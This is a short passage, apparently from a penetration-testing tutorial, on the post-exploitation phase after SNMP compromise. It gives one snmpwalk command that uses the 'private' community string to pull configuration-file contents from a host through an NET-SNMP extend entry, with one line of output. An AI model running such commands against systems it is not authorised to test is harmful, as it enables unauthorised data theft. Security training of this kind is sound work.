Post-Exploitation Phase

After successfully exploiting SNMP vulnerabilities, the post-exploitation phase focuses on maintaining access.

1. Data Exfiltration

One of the primary goals of post-exploitation is to extract valuable data from the compromised system.

Extract configuration file contents using SNMP extensions

$ snmpwalk -v2c -c private 192.168.1.10 NET-SNMP-EXTEND-MIB::nsExtendOutput1Line.config
NET-SNMP-EXTEND-MIB::nsExtendOutput1Line.config = STRING: # Network configuration